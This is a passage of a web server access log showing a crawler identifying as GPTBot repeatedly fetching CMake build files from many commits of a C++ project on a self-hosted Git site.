+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11324] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11234] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11235] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11206] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24300] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11621] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:18:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11326] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11122] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11504] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11325] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:18:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11236] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15281] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11188] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15276] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11323] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15275] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11232] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16062] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:18:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11234] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15276] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 24301] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:18:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11507] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11511] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 